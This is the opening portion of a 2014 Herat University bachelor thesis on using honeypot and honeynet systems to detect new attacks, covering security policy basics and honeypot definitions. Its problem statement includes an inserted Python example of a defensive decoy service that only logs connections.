
Islamic Republic of Afghanistan

Ministry of Higher Education

Herat University

Computer Science Faculty

Department of Communication & Operating System

Designing Countermeasures For Tomorrows Threats

By: Darwish Ahmad Herati

Supervisor: M.Sc. Mrs. Maria Sawabi Nezehat

December 8, 2014

Contents

Contents iii

Abstract viii

Acknowledgement ix

1 INTRODUCTION 1

1.1 Problem Statement . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.2 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.3 Goal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.4 Thesis Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

2 COMPUTER AND NETWORK SECURITY 6

2.1 Network Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . 6

2.2 Importance of Network Security Policy . . . . . . . . . . . . . . . . . 7

2.3 Elements of Security Policy . . . . . . . . . . . . . . . . . . . . . . . 7

2.4 Implementing Network Security Policy . . . . . . . . . . . . . . . . . 8

2.5 The Security Trinity . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.1 Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.2 Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.3 Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.6 The Security Models . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.6.1 Security By Obscurity Model . . . . . . . . . . . . . . . . . . 10


2.6.2 The Perimeter Defense Model . . . . . . . . . . . . . . . . . . 10

2.6.3 The Defense In Depth Model . . . . . . . . . . . . . . . . . . 10

2.7 The Zero Concept . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.8 Network Security Terminologies . . . . . . . . . . . . . . . . . . . . . 11

3 HONEYPOT SYSTEMS 13

3.1 Definition of Honeypot System . . . . . . . . . . . . . . . . . . . . . . 13

3.2 History of Honeypot System . . . . . . . . . . . . . . . . . . . . . . . 14

3.3 Classification of Honeypot Systems . . . . . . . . . . . . . . . . . . . 14

3.3.1 Classifying Honeypot Systems By Purpose . . . . . . . . . . . 14

3.3.2 Classifying Honeypot Systems by Level of Interaction . . . . . 16

3.4 Honeypot Systems Policy . . . . . . . . . . . . . . . . . . . . . . . . . 17

3.5 The Value of Honeypot Systems . . . . . . . . . . . . . . . . . . . . . 17

4 HONEYNET SYSTEMS 19

4.1 Definition of Honeynet Systems . . . . . . . . . . . . . . . . . . . . . 19

4.2 Overview of Honeynet Systems . . . . . . . . . . . . . . . . . . . . . 19

4.3 Countries That Use Honeynet Systems . . . . . . . . . . . . . . . . . 20

4.3.1 IRAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

4.3.2 PAKISTAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

4.3.3 INDIA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

4.3.4 SAUDI ARABIA . . . . . . . . . . . . . . . . . . . . . . . . . 23

4.3.5 GERMANY . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

4.3.6 POLISH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

4.3.7 UK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

4.4 Security Communities That Use Honeynet Systems . . . . . . . . . . 27

4.4.1 THE HONEYNET PROJECT . . . . . . . . . . . . . . . . . . 27

4.4.2 THE NORSE . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

4.4.3 THE FIREEYE . . . . . . . . . . . . . . . . . . . . . . . . . . 30

4.4.4 THE GLOBAL BOTNET THREAT ACTIVITY . . . . . . . 31

4.4.5 THE WORLD MAP . . . . . . . . . . . . . . . . . . . . . . . 32

4.4.6 THE KASPERSKY MAP . . . . . . . . . . . . . . . . . . . . 33


4.5 Honeynet Systems For Afghanistan . . . . . . . . . . . . . . . . . . . 34

5 HONEYPOT AND HONEYNET SYSTEMS TECHNOLOGIES 38

5.1 Honeyd (Honey Daemon) . . . . . . . . . . . . . . . . . . . . . . . . . 38

5.1.1 Value of Honeyd . . . . . . . . . . . . . . . . . . . . . . . . . 39

5.1.2 How Honeyd Works . . . . . . . . . . . . . . . . . . . . . . . . 40

5.1.3 Interacting With Attackers . . . . . . . . . . . . . . . . . . . . 40

5.2 Kippo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

5.2.1 Features of Kippo . . . . . . . . . . . . . . . . . . . . . . . . . 42

5.2.2 How Kippo Works . . . . . . . . . . . . . . . . . . . . . . . . 42

5.3 Conpot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.4 Dionaea . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.5 HoneyWall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.6 HoneyBot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

5.7 BackOfficer Friendly . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

5.8 The Value of BOF . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

6 DESIGNING COUNTERMEASURES FOR TOMORROWS THREATS 47

6.1 Implementation of Honeyd (Honey Daemon) Technology . . . . . . . 48

6.2 Implementation of Kippo Technology . . . . . . . . . . . . . . . . . . 56

Conclusion 68

Further Research 69

Bibliography 71


List of Figures

1.1 The Goal Diagram . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

2.1 The Security Trinity . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

3.1 The Honeypot Classification Diagram . . . . . . . . . . . . . . . . . . 15

4.1 The Iran Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . 21

4.2 The Pakistan Honeynet System . . . . . . . . . . . . . . . . . . . . . 22

4.3 India Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . . . 23

4.4 Saudi Arabia Honeynet System . . . . . . . . . . . . . . . . . . . . . 24

4.5 German Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . 25

4.6 The Polish Honeynet System . . . . . . . . . . . . . . . . . . . . . . . 26

4.7 The United Kingdom Honeynet System . . . . . . . . . . . . . . . . . 27

4.8 The Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . . . . 29

4.9 The Norse Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . 30

4.10 The FireEye Honeynet System . . . . . . . . . . . . . . . . . . . . . . 31

4.11 The Global Honeynet System . . . . . . . . . . . . . . . . . . . . . . . 32

4.12 The WorldMap3 Honeynet System . . . . . . . . . . . . . . . . . . . 33

4.13 The WorldMap3 Honeynet System . . . . . . . . . . . . . . . . . . . 34

4.14 The Afghanistan Map . . . . . . . . . . . . . . . . . . . . . . . . . . 35

4.15 The Afghanistan Ministries . . . . . . . . . . . . . . . . . . . . . . . 36

4.16 The Best Solution For Afghanistan . . . . . . . . . . . . . . . . . . . 37

6.1 The Used Operating Systems . . . . . . . . . . . . . . . . . . . . . . 48


6.2 The Installation of Honeyd Technology . . . . . . . . . . . . . . . . . 48

6.3 The List of Honeypot Folder . . . . . . . . . . . . . . . . . . . . . . . 49

6.4 Making of a Template For Emulation . . . . . . . . . . . . . . . . . . 49

6.5 Making of a Router Template For Emulation . . . . . . . . . . . . . . 49

6.6 The Scripts For Service Emulation of Honeyd Technology . . . . . . . 50

6.7 Running of the Honeyd Technology . . . . . . . . . . . . . . . . . . . 50

6.8 Pinging the Emulated Systems . . . . . . . . . . . . . . . . . . . . . . 51

6.9 Capturing the Attackers Interaction . . . . . . . . . . . . . . . . . . . 51

6.10 The nmap of Emulated System for Ports Vulnerabilities . . . . . . . . 52

6.11 Running of the Honeyd2MySQL For Entering Captured Data into a MySQL Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52

6.12 The Process of Entering Gathered Informations to the MySQL Database 53

6.13 The list of files of Honeyd-VIZ Web Interface . . . . . . . . . . . . . . 53

6.14 The Web Interface Configuration File . . . . . . . . . . . . . . . . . . 54

6.15 Generating the Honeyd-VIZ Graph . . . . . . . . . . . . . . . . . . . 54

6.16 The Geographical Location of the Attackers . . . . . . . . . . . . . . 55

6.17 The Various Graphs For Different Issues . . . . . . . . . . . . . . . . 55

6.18 The List of Files and Running of Kippo Technology . . . . . . . . . . 56

6.19 The Valid Users Database . . . . . . . . . . . . . . . . . . . . . . . . 57

6.20 Start Attacking to the Kippo Technology . . . . . . . . . . . . . . . . 57

6.21 Live Monitoring Log File of Kippo Technology . . . . . . . . . . . . 58

6.22 Live Monitoring Log file of Kippo Technology . . . . . . . . . . . . . 58

6.23 Attempting to Connect With Wrong Passwords . . . . . . . . . . . . 59

6.24 Attempting to Connect With Correct Passwords . . . . . . . . . . . . 59

6.25 After Entering Interacting With Emulated System Adding New Users 60

6.26 Doing More Interactions Making Files and Folders . . . . . . . . . . . 60

6.27 And More Interaction Monitoring Network Interfaces . . . . . . . . . 61

6.28 Monitoring Kippo Technology Log File Real Time . . . . . . . . . . . 61

6.29 Running the Kippo2MySQL Script for Entering Gathered Information to the Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

6.30 Entering Gathered Information to The Database . . . . . . . . . . . . 62


6.31 List of Web Interface Files and Configuration File . . . . . . . . . . . 63

6.32 Web Interface Configuration File . . . . . . . . . . . . . . . . . . . . 63

6.33 Generating Graphs From Gathered Information . . . . . . . . . . . . 64

6.34 Various Graphs for Different Issues . . . . . . . . . . . . . . . . . . . 64

6.35 The Commands that the Attackers Used . . . . . . . . . . . . . . . . 65

6.36 The Kippo Play Log . . . . . . . . . . . . . . . . . . . . . . . . . . . 65

6.37 The Kippo Play Log . . . . . . . . . . . . . . . . . . . . . . . . . . . 66

6.38 The Geographical Location of the Attackers . . . . . . . . . . . . . . 66

6.39 The Graph Gallery of Kippo Technology . . . . . . . . . . . . . . . . . 67


Designing Countermeasures For Tomorrows Threats

Darwish Ahmad Herati

Abstract

Internet and network security is among the most important and highest-priority issues for almost all types of organizations, for instance military divisions, ministries, banks, other public and private sectors, and even individuals who are concerned about it.

These organizations may use security mechanisms to keep their assets safe against evil-doers and attackers, but most of the security countermeasures they use are based on known attacks, threats and vulnerabilities. They hardly pay attention to protecting their assets against unknown and new types of attacks, threats and vulnerabilities, and most organizations face the challenge of new, unknown attacks and threats.

The main aim of this research paper is to study approaches and solutions against unknown attacks and threats; it is therefore titled Designing Countermeasures for Tomorrows Threats, with the goal of enabling organizations to detect new types of attacks, threats or vulnerabilities before they damage their assets or systems. In addition, the outcome of this research will give organizations the chance to learn who is attacking their systems, how they are being attacked, and what the attackers are trying to achieve. The concepts this research paper (thesis) uses for Designing Countermeasures for Tomorrows Threats are honeypot and honeynet systems.

Honeypot and honeynet systems are among the most interesting and well-known concepts that security professionals use to know their enemies and identify their weaknesses. It is worth mentioning that most countries, i.e. Iran, Pakistan, India, Saudi Arabia, Germany and Poland, are using these concepts to protect their internal networks and assets against attackers. Besides, a great number of security organizations and communities use these concepts for research, to learn and to educate the public about new types of attacks, threats and vulnerabilities, namely the Honeynet Project, Norse, FireEye, WorldMap and Global Botnet Threat Activity.

This thesis implemented most of the existing technologies based on the honeypot and honeynet concept, both open source and closed source. Finally, it suggests and recommends the best solution for Afghanistan to protect its internal networks, especially important organizations such as the Ministry of Interior and other ministries and sectors.

SUPERVISOR : M.C.S. : M. Sawaby Nezhat


Acknowledgement

First of all I would like to thank my supervisor M.Sc. Mrs. Maria Sawaby Nezhat for her guidance and technical support. Thanks to her for making the successful completion of this thesis possible. Thesis writing is a difficult challenge, but I finished it with her help.

Secondly I would like to thank Mr. Abdul Rahman Vakili, the one who persuaded me to research this interesting subject for my bachelor thesis. I would like to appreciate him for his time-to-time guidance about project directions.

Thirdly I would like to say thanks to my best friend, teacher and older brother M.Sc. Mr. Abdul Rahman Sherzad, lecturer at the Computer Science Faculty at the University of Herat. He is the one who taught me how to think and changed my whole life.

In addition I would like to thank my dear friends, especially Hasibullah Ansari, for encouraging me to work on this thesis with passion until it was completed.

Lastly I wish to take this opportunity to express my deepest thanks to my dearest parents and brothers for their unconditional love, support and encouragement throughout the research. I would also like to convey thanks to my lecturers, professors, classmates and friends. Their academic enlightenment made my achievements possible during the four years of my bachelor degree.

Darwish Ahmad Herati

December, 2014

Herat, Afghanistan


Chapter 1 INTRODUCTION

Global communications are becoming more important every day, and the level of malicious activity and computer crime is increasing rapidly. Countermeasures are built and developed to detect and prevent these kinds of illegal activities, but most of them only detect and prevent known attacks and known malicious activities. By learning the attackers' strategies, countermeasures can be improved and vulnerabilities can be fixed. A great number of security technologies are available today, both commercial and open source, but none of them alone can protect all of an organization's security goals.

Security professionals are looking for more advanced technologies that are effective in detecting and preventing security breaches. As a network security administrator you have to design efficient, extreme and sometimes diverse protection mechanisms and be prepared to protect the assets on your network. Despite all these precautions, attacks still happen, and computer security fails to secure computer networks against new types of attacks.

As the title of this thesis, Designing Countermeasures for Tomorrow's Threats, makes obvious, the idea is to monitor the activities of attackers. The methodology adopted is to deceive them by offering a real or emulated set of services on a system that appears to be legitimate. The attackers' activities are then logged and monitored to learn the tactics they employ. This idea is implemented using honeypot and honeynet systems. Organizations such as banks, the military, airports, transport and research organizations use them to detect new types of technologies and attacks.

Honeypot and honeynet systems are very different from most traditional security mechanisms. A honeypot is a system whose value lies in being probed, attacked or compromised; gathering as much information as possible about that activity is the main goal of honeypot and honeynet systems. Generally, such information gathering must be done silently, without alerting the attackers. All the gathered information then gives us an advantage in defending and can be used to prevent attacks. There are many other definitions of honeypot and honeynet systems, depending on how the technology is used. Honeypot and honeynet systems are primarily an instrument for information gathering and learning, because they record all actions and interactions with attackers. Since honeypot and honeynet systems do not provide any legitimate services, all activity directed at them is unauthorized and malicious.

This thesis explains what a honeypot or honeynet system is, how it works, and the different kinds of value this unique technology can have. It then goes into the details of different types of honeypot and honeynet technologies and shows what a real attack looks like to a honeypot or honeynet system. The main goal of this thesis is not just to give you an understanding of honeypot and honeynet systems and their architecture, but to provide you with the skill and experience to deploy the best honeypot solution for your own organization. Inside the thesis you will see where honeypot and honeynet systems are used. Knowledge and skills are the two important keys to defending against new types of attacks, or tomorrow's threats: by using a honeypot or honeynet system you track the attackers and learn about them.

1.1 Problem Statement

The problems this thesis addresses can be stated in a single paragraph. We need to learn how we are being attacked. We need to learn who is attacking us. We need to learn what the attackers are trying to achieve. We need to learn how to defend against attackers, and how to build a security mechanism that waits for attacks. By tracing the attackers' activities we can learn a lot about them: their locations, their technologies and what they want from attacking our networks. The thesis looks for solutions to all these questions and considers what can be done to make our network more secure.
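The deception-and-logging idea from the introduction and the who/how/what questions of the problem statement can be made concrete in a few dozen lines. The following Python program is an added example, not code from the thesis or from any of the honeypot tools it later covers: a minimal low-interaction TCP decoy that shows a fake service banner, records whatever the peer sends without ever acting on it, and summarises the log by source address and by the first command attempted. The banner, the host name `example.invalid`, the `probe()` client that stands in for a scanner on the loopback interface, and all class and function names are constructed for this example.

```python
import json
import socket
import threading
import time
from collections import Counter

# Constructed banner for the emulated service. "example.invalid" is a
# placeholder host name (an assumption of this example), not a real server.
FAKE_BANNER = b"220 mail.example.invalid ESMTP ready\r\n"


class ConnectionLogger:
    """Thread-safe in-memory record of every interaction with the decoy."""

    def __init__(self):
        self.events = []
        self._lock = threading.Lock()

    def record(self, peer, data):
        event = {"ts": time.time(), "src_ip": peer[0], "src_port": peer[1],
                 "bytes": len(data),
                 # latin-1 decodes any byte, so the preview never raises.
                 "preview": data[:64].decode("latin-1")}
        with self._lock:
            self.events.append(event)
        return event

    def wait_for_events(self, count, timeout=5.0):
        """Poll until at least `count` events exist; True on success."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self._lock:
                if len(self.events) >= count:
                    return True
            time.sleep(0.01)
        return False

    def summary(self):
        """Who (source IPs), how often, and what they tried (first word sent)."""
        with self._lock:
            events = list(self.events)
        sources = Counter(e["src_ip"] for e in events)
        commands = Counter((e["preview"].split() or ["<empty>"])[0].upper()
                           for e in events)
        return {"connections": len(events),
                "top_sources": sources.most_common(5),
                "commands": commands.most_common(5)}

    def to_jsonl(self):
        """One JSON object per line, the form a log shipper would collect."""
        with self._lock:
            return "\n".join(json.dumps(e) for e in self.events)


def handle_client(conn, peer, logger, banner=FAKE_BANNER):
    """Send the fake banner, capture what the peer sends, never act on it."""
    data = b""
    try:
        conn.settimeout(3.0)
        conn.sendall(banner)
        while len(data) < 4096:            # cap what one peer can make us store
            chunk = conn.recv(1024)
            if not chunk:
                break
            data += chunk
            if b"\n" in chunk:             # one command line is enough to learn intent
                break
    except (socket.timeout, OSError):
        pass                               # a scanner that hangs up early is still an event
    finally:
        conn.close()
        logger.record(peer, data)


class Honeypot:
    """Low-interaction TCP decoy: accept, hand off to handle_client, repeat."""

    def __init__(self, logger, host="127.0.0.1", port=0, banner=FAKE_BANNER):
        self.logger, self.banner = logger, banner
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))       # port 0 lets the OS pick a free port
        self.sock.listen(16)
        self.sock.settimeout(0.2)          # so the accept loop notices stop()
        self.port = self.sock.getsockname()[1]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._loop, daemon=True)

    def start(self):
        self._thread.start()
        return self.port

    def _loop(self):
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            threading.Thread(target=handle_client, daemon=True,
                             args=(conn, peer, self.logger, self.banner)).start()
        self.sock.close()

    def stop(self):
        self._stop.set()
        self._thread.join(timeout=2.0)


def probe(port, payload, host="127.0.0.1"):
    """Constructed stand-in for a scanner; returns the banner it was shown."""
    with socket.create_connection((host, port), timeout=3.0) as s:
        banner = s.recv(1024)
        s.sendall(payload)
    return banner


if __name__ == "__main__":
    log = ConnectionLogger()
    decoy = Honeypot(log)
    port = decoy.start()
    probe(port, b"EHLO scanner.example\r\n")   # constructed "attacker" on loopback
    log.wait_for_events(1)
    decoy.stop()
    print(log.to_jsonl())
    print(log.summary())
```

Two design points matter for the thesis's argument. The decoy never interprets the bytes it receives, so nothing an attacker sends can change its behaviour; it only records. And because the service is not real, every connection in the log is by definition unsolicited, which is what makes the "who" and "what" columns of `summary()` meaningful without any filtering for legitimate traffic.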

As discussed before, most of the countries of the world use these concepts to protect their internal networks against unknown and new types of attacks, threats and vulnerabilities, such as Iran, Pakistan, India, Saudi Arabia, Poland and Germany. There are also many organizations that use these concepts to learn about new types of attacks, threats and vulnerabilities and share them with the public, such as the Honeynet Project, Norse, Global Botnet, World Map and Kaspersky.

Securing Afghanistan's internal networks is an important issue, especially for Afghanistan's ministries, organizations, airports, universities and banks. Once a system is attacked we need to learn who is attacking us, how we are being attacked, what the attackers are trying to achieve and how to defend against them. Everyone can learn these things by implementing honeypot and honeynet systems in their networks. This thesis is going to suggest the best solution for Afghanistan's internal networks, especially for Afghanistan's ministries such as the Ministry of Interior.


1.2 Motivation

First of all, I am interested in this field of study, which is network security. The motivation for choosing this subject for the thesis was that honeypot and honeynet systems seem to be very interesting technologies for securing computer networks, and they are used extensively all over the world. There are many other motivations for working on this thesis, such as securing Afghanistan's internal networks; recognizing the enemies of Afghanistan and their actions on internal networks; showing others that we can do everything at the highest level of knowledge; defending against the attackers; and learning new types of attacks and their tactics after implementing this concept.

Another motivation is being aware of tomorrow's threats, which is the title of the thesis, and knowing how to protect our organization from attacks, using this concept to learn and develop our knowledge about network security, especially in the case of unknown and new types of attacks, threats and vulnerabilities. Finally, laughing at the attackers was also one of the many motivations.

1.3 Goal

The goal of this thesis is to find the solution for the problems described in the problem statement section. To achieve this goal it has been divided into some smaller parts, to move toward the main goal step by step. This division is shown in figure 1.1.


Figure 1.1: The Goal Diagram

As shown in figure 1.1, the main goal is divided into some smaller parts. It is useful to have brief information about each part:

• Idea: The first part was the idea, which was the title and what concept to use. The title was Designing Countermeasures For Tomorrows Threats and the concept was Honeypot and Honeynet Systems.

• Information Gathering: The second part was gathering information from books, theses, articles and other sites on the internet.

• Today's Technologies: Countries and organizations that are using these concepts to protect their internal networks or for research.

• Implementation: Focusing on open source and closed source technologies that exist at the time of writing this thesis.

• Best Solution: Finally presenting the best solution for the problems after analysing the results of all the previous parts.

How a network security administrator can obtain information and track the attackers. Explaining and coming up with some discussions regarding what should and should not be done with respect to the laws, and having some opinions and suggestions based on the subject while looking for the answers to security problems.

1.4 Thesis Structure

This thesis starts with an introduction and then goes on to achieve the main goal, which is designing countermeasures for tomorrow's threats, in several chapters.

• Introduction Chapter: Covers the problem description, motivation, goal and restrictions, then moves on to the next chapter.

• Network Security Chapter: The second chapter explains some requirements of the thesis, generally about computer and network security. It discusses network security policy, elements of network security policy, implementing network security policy, the security trinity, the security models and network security terminologies.

• Honeypot Systems Chapter: The third chapter focuses on the main subject of the thesis, honeypot systems: the definition of honeypot systems, the history of honeypot systems, honeypot system classifications, honeypot system policy and the value of honeypot systems.

• Honeynet Systems Chapter: The fourth chapter discusses honeynet systems.

• Honeypot and Honeynet Technologies Chapter: The fifth chapter discusses some important honeypot and honeynet system technologies that are in use today.

• Designing Countermeasures For Tomorrows Threats: The last chapter, chapter six, is about the practical implementation of the thesis.


Chapter 2 COMPUTER AND NETWORK SECURITY

The primary goal of computer and network security is to protect the organization's assets. Assets here do not mean physical devices or software; they mean the information inside the computers and the network. Security is a vital issue for organizations to gain competitive advantage. For example, a bank that offers internet banking services must be completely secure against attackers to reassure its customers; otherwise it will lose them. This means that everything in a network must be secured against internal and external threats.

Information security also covers other areas, such as accidents, natural disasters and other unintentional actions that result in information corruption or loss, and has its own security policies for these issues, such as backup and disaster recovery. Identify what you are trying to protect and determine what you are trying to protect it from. Determine the threats. Try to implement efficient and cost-effective countermeasures for protecting your assets. Be aware of the threats to and weaknesses of your network at all times. Once you face a problem, try to solve it as fast as possible.

This thesis also focuses on a single security subject: designing countermeasures for threats using honeypot systems. Reports and statistics on organizations' histories related to computer and network security are left out of this thesis in order to focus on important and useful information. Short and useful information about the fundamentals of computer and network security is the best way to achieve the goals of this thesis.

2.1 Network Security Policy

Before starting the main topic, the reason for discussing this subject should be made clear. The important reason is the importance of a network security policy and its benefits and advantages in a computer network. Before implementing security mechanisms, their policies need to be determined. Here, the main goal of this thesis requires brief information about network security policy, the importance of network security policy, the elements of a security policy and the implementation of a network security policy.

A network security policy defines a structure for protecting our assets, whether shared or not. All the rules and access limitations for users and for accessing the assets are covered and defined under the network security policies. The network security policies are the source of information for security administrators when they set up, audit and troubleshoot the network and face problems. Everything about the security policies is discussed in detail: which policy to implement and how to implement it, and information about the users, network administrators, network managers, network auditors and the general manager who owns the network and its resources. The next sections discuss the importance and the elements of a network security policy.[9]

2.2 Importance of Network Security Policy

Some of the benefits of a network security policy are minimizing the risk of data loss, protecting against malicious external and internal users, and protecting assets from unauthorized access, modification, disclosure and destruction.

• Network Protection: A network security policy is important for network protection, to have a trusted, secure environment.

• Network Extension: A network security policy is important for network extension, to keep connectivity safe while enlarging the network.

• Network Acceleration: A network security policy is important for network acceleration, which gives us the solution for managing, controlling and optimizing internet traffic and content running at maximum availability and at faster speeds.

• Network Management: A network security policy is important for managing networks: the ability to manage everything deployed in a network and ensure that it operates at maximum effectiveness. In centralised management everything is done remotely from one location: upgrade, backup, restore, and monitoring of operating systems, firewalls and intrusion detection systems.

2.3 Elements of Security Policy

Let's have brief information about the important elements of a network security policy.[11]

• Privacy policy: defines the reasonable expectations regarding privacy, such as monitoring of e-mail, logging of keystrokes and access to users' files.

• Access policy: defines the privileges and access rights to assets.

• Accountability policy: defines the responsibilities of users, operations staff and administrators.

• Authentication policy: defines effective trust through a strong password policy.

• Availability policy: defines users' expectations about access to and availability of resources.

• Information technology and network maintenance policy: defines how both internal and external maintenance people are allowed to work and access technology, including the policies needed when controlling systems remotely.

• Violation reporting policy: defines that violations, whether internal, external, privacy or security, must all be reported.

• Supporting information policy: provides users, staff and management with contacts, and guides others about violations and new policies related to them.

There are many other elements in a network security policy. Each of the above elements would need an individual chapter to discuss; this thesis is not the place to explain them in detail.

2.4 Implementing Network Security Policy

After defining network security policy and its elements, brief information about implementing a network security policy is necessary, because implementing a security policy is not a simple matter. Different countries have different laws regarding the use of honeypot systems, and security administrators who are going to implement honeypot systems and capture information should know about them.

Honeypot systems cover technical and non-technical aspects. You must understand that it is challenging to find the correct equipment that can work together (that is, components compatible with each other), to implement the security policy correctly, and to come up with a design that works for all parties. There are some critical points to keep in mind before implementing a security policy; they can help you in the implementation of security policies.[17]

• All members of the organization, including users and managers, must agree on the security policy you are going to implement.

• Train and educate users about why security is important, and make sure that everyone understands the reasons behind the security policy and what is going to be implemented. This process must be continuous, for old and new users alike.

• Security is not free and implementing a security policy is expensive. It is important to educate management about the security policies.

• You have to clearly define the responsibilities of the various people for the various parts of the network and their reporting relationships.


2.5 The Security Trinity

Prevention, detection and response are the three roots of computer and network security. When organizations want to implement security policies, the security trinity must be the foundation of all the security policies developed in that organization. Figure 2.1 shows the security trinity.

Figure 2.1: The Security Trinity

2.5.1 Prevention

The security trinity is the foundation of computer and network security, and prevention is the foundation of the security trinity. Prevention means designing countermeasures to prevent the abuse of vulnerabilities. As a first step, an organization must emphasize prevention rather than detection or response, because it is easier, more efficient and much more cost effective to prevent a security breach than to detect or respond to it. Remember that it is impossible to prevent all security vulnerabilities, but you can design a strong prevention mechanism that discourages attackers and makes them move on to another, easier, vulnerable system.[6]

2.5.2 Detection

After designing preventive measures for the organization, if they unfortunately fail, it is very important to detect the breach as soon as possible. If we detect the problem immediately it is easier to find a solution for it.[6]

2.5.3 Response

If the prevention and detection mechanisms fail, the organization needs a plan for responding to the security breach. This plan must be documented and must define who is responsible for what at each level of response.[6]


2.6 The Security Models

Security is achieved by implementing a combination of different security models together. There are three basic security models: the security by obscurity model, the perimeter defense model and the defense in depth model. Let's have a brief explanation of each.

2.6.1 Security By Obscurity Model

This model focuses on hiding the network: as long as the network is hidden, it is not a target for attack. The problem with this concept is that it does not work in the long term, because once the network is discovered it becomes completely vulnerable and a good opportunity for attackers.[6]

2.6.2 The Perimeter Defense Model

This model focuses on the border of the network. It is safe from outside attackers, but the problem with this concept is that it cannot prevent attacks from inside. Firewalls can protect the borders from outside attacks but do nothing about inside attacks, so the network remains vulnerable from the inside.[6]

2.6.3 The Defense In Depth Model

In this model each system defends itself. This model is the most widely used. In this concept the internal network is safe, but the surroundings or borders are not secure. For these reasons, when organizations determine their security policies they usually combine these models to achieve security.[6]

2.7 The Zero Concept

Network security uses several concepts under the names Zero-Day and Zero-Hour attack, threat and vulnerability. In this thesis all of these concepts are combined into one concept called the Zero concept. There are many definitions for this concept, but in general they are all the same.[12], [5], [18]

Zero-Day Attacks: attacks that target publicly known but still unpatched vulnerabilities. In another definition, the term refers to software or hardware vulnerabilities that have been exploited by attackers when there is no prior knowledge of the flaw in the general information security community, and therefore no vendor fix or software patch is available for it.[4], [7], [16]


2.8 Network Security Terminologies

It is necessary to have brief information about the terminologies related to network security before diving into our main subject, because these terms are the basis for our discussion of network security. The terms are explained briefly below.

• Threat: Anything that interrupts the operation, functioning, integrity or availability of a computer or network is called a threat. There are different types of threats: intentional threats, such as someone directly attacking a system; unintentional threats, such as stupidity; and natural threats, such as storms, earthquakes, floods and fire. Each of these threats can damage the computer network.

• Vulnerability: A vulnerability is a weakness in the design, configuration or implementation of a computer or a network of computers. A poor network design with security holes makes the computer network vulnerable to attack. Likewise, a poor implementation, with systems configured incorrectly, makes the systems vulnerable to attack. Poor management leaves the network vulnerable and creates good opportunities for attackers. Everything related to the network security of an organization must be documented.

Different kinds of vulnerabilities exist. Physical vulnerabilities: place important physical equipment such as routers, switches and servers in safe places, such as server rooms, where only specially authorized people may go. Hardware and software vulnerabilities. Media vulnerabilities: physical devices such as hard drives can be stolen. Human vulnerabilities: carelessness, craziness, stupidity and anger are all vulnerabilities of the computer or network.[8]

• Countermeasures: Techniques and methods used to defend against attacks, threats or vulnerabilities.

• Identification: A simple process by which an identity is presented to the system, such as a logon ID.

• Authentication: The process that checks or proves that you are who you claim to be, for example using a username and password.

• Authorization: Also called access control; refers to the level of access an identity is allowed.

• Availability: Having uninterrupted access to the information in the system or computer network.


• Confidentiality: Preventing unauthorized access to information. Also called secrecy or privacy; encryption is an example.

• Integrity: Protecting the accuracy of information from unauthorized access and modification.


Chapter 3
HONEYPOT SYSTEMS

Now let's start discussing the issues that the thesis is about. As you know, the thesis is about designing countermeasures for tomorrow's threats. To design countermeasures that detect and prevent new or unknown threats and attacks, the concepts of honeypot and honeynet systems are used. This chapter mainly focuses on honeypot systems: their definition, history, classification, policies, value, advantages and disadvantages. Honeynet systems will be discussed in detail in their own chapter, the next one.

3.1 Definition of Honeypot System

In the security community everyone has his or her own definition of a honeypot system. Some people think a honeypot is a tool for deception, while others consider it a weapon to lure hackers, and some believe it is another kind of intrusion detection system. Others believe that a honeypot emulates vulnerabilities, others see it simply as a jail, and some view a honeypot as a controlled production system that attackers can break into. These various viewpoints have caused a lot of misunderstanding about what a honeypot is and thus about its value.[14], [15]

The definition of a honeypot used in this thesis is as follows. A honeypot is a security resource whose value lies in being probed, attacked or compromised, and which is used as a countermeasure for new types of threats and attacks.

Designing countermeasures for tomorrow's threats focuses on implementing the concept of a honeypot system: we can build a virtual environment such that whenever an attacker uses new strategies and technologies to attack our network, that communication is routed to the virtual environment made by the honeypot system, which starts interacting with the attacker. The honeypot system captures everything the attacker does with the system. We need to learn how we are being attacked, who is attacking us, what the attackers are trying to achieve and how to defend ourselves; to achieve this we use honeypot systems.


